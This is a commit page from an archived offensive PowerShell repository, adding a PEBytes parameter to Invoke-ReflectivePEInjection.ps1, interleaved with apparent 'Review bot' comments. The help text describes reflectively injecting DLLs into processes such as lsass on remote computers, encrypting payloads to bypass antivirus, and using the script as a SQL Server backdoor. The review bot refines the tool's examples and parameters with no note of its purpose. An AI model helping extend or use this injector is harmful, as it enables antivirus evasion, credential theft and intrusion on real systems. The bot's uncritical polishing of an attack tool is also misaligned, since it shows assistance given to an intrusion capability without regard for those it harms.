This repository was archived by the owner on Jan 21, 2021. It is now read-only.

Commit 93bc214

Adding PEBytes parameter
Added PEBytes parameter for reflectively loading a PE file passed as a byte array to the script.
1 parent 90a05de commit 93bc214

File tree

1 file changed

+17
-5
lines changed


CodeExecution/Invoke-ReflectivePEInjection.ps1

+17-5
@@ -23,7 +23,7 @@ from the DLL. The script doesn't wait for the DLL to complete execution, and doe
2323
remote process.
2424
2525
26-
While this script provides functionality to specify a file to load from disk or from a URL, these are more for demo purposes. The way I'd recommend using the script is to create a byte array
26+
While this script provides functionality to specify a file to load from disk a URL, or a byte array, these are more for demo purposes. The way I'd recommend using the script is to create a byte array
2727
containing the file you'd like to reflectively load, and hardcode that byte array in to the script. One advantage of doing this is you can encrypt the byte array and decrypt it in memory, which will
2828
bypass A/V. Another advantage is you won't be making web requests. The script can also load files from SQL Server and be used as a SQL Server backdoor. Please see the Casaba
2929
blog linked below (thanks to whitey).
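Review bot: the rewritten sentence at line 26 drops a comma in the list; "load from disk a URL, or a byte array" should read "load from disk, a URL, or a byte array". Since the same paragraph goes on to recommend hardcoding a byte array in the script as the preferred way to use it, it would also help to say here that -PEBytes is the parameter that takes that array.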
@@ -33,7 +33,7 @@ Author: Joe Bialek, Twitter: @JosephBialek
3333
License: BSD 3-Clause
3434
Required Dependencies: None
3535
Optional Dependencies: None
36-
Version: 1.3
36+
Version: 1.4
3737
3838
.DESCRIPTION
3939
@@ -47,6 +47,10 @@ The path of the DLL/EXE to load and execute. This file must exist on the compute
4747
4848
A URL containing a DLL/EXE to load and execute.
4949
50+
.PARAMETER PEBytes
51+
52+
A byte array containing a DLL/EXE to load and execute.
53+
5054
.PARAMETER ComputerName
5155
5256
Optional, an array of computernames to run the script on.
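Review bot: the new .PARAMETER PEBytes help entry should state that it is mutually exclusive with -PEPath and -PEUrl, since it is bound in its own "Bytes" parameter set, and should say what it expects: the raw bytes of the DLL/EXE (for example from [System.IO.File]::ReadAllBytes, which the LocalFile path already uses), not a base64 string or a file path.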
@@ -107,6 +111,11 @@ Invoke-ReflectivePEInjection -PEPath DemoEXE.exe -ExeArgs "Arg1 Arg2 Arg3 Arg4"
107111
Refectively load DemoDLL_RemoteProcess.dll in to the lsass process on a remote computer.
108112
Invoke-ReflectivePEInjection -PEPath DemoDLL_RemoteProcess.dll -ProcName lsass -ComputerName Target.Local
109113
114+
.EXAMPLE
115+
116+
Load a PE from a byte array.
117+
Invoke-ReflectivePEInjection -PEPath (Get-Content c:\DemoEXE.exe -Encoding Byte) -ExeArgs "Arg1 Arg2 Arg3 Arg4"
118+
110119
.NOTES
111120
GENERAL NOTES:
112121
The script has 3 basic sets of functionality:
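Review bot: the new example passes the byte array to -PEPath rather than to the new -PEBytes parameter, so it does not exercise the code path this commit adds; it should read `Invoke-ReflectivePEInjection -PEBytes (Get-Content c:\DemoEXE.exe -Encoding Byte) -ExeArgs "Arg1 Arg2 Arg3 Arg4"`. Two smaller points: `Get-Content -Encoding Byte` only exists in Windows PowerShell (PowerShell 6 and later replaced it with -AsByteStream), and without `-ReadCount 0` it emits the file one byte at a time; `[System.IO.File]::ReadAllBytes('c:\DemoEXE.exe')` works on every PowerShell version and sidesteps both.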
@@ -182,6 +191,11 @@ Param(
182191
[Parameter(ParameterSetName = "WebFile", Position = 0, Mandatory = $true)]
183192
[Uri]
184193
$PEUrl,
194+
195+
[Parameter(ParameterSetName = "Bytes", Position = 0, Mandatory = $true)]
196+
[ValidateNotNullOrEmpty()]
197+
[Byte[]]
198+
$PEBytes,
185199

186200
[Parameter(Position = 1)]
187201
[String[]]
@@ -2886,14 +2900,12 @@ Function Main
28862900

28872901
Write-Verbose "PowerShell ProcessID: $PID"
28882902

2889-
[Byte[]]$PEBytes = $null
2890-
28912903
if ($PsCmdlet.ParameterSetName -ieq "LocalFile")
28922904
{
28932905
Get-ChildItem $PEPath -ErrorAction Stop | Out-Null
28942906
[Byte[]]$PEBytes = [System.IO.File]::ReadAllBytes((Resolve-Path $PEPath))
28952907
}
2896-
else
2908+
elseif ($PsCmdlet.ParameterSetName -ieq "WebFile")
28972909
{
28982910
$WebClient = New-Object System.Net.WebClient
28992911
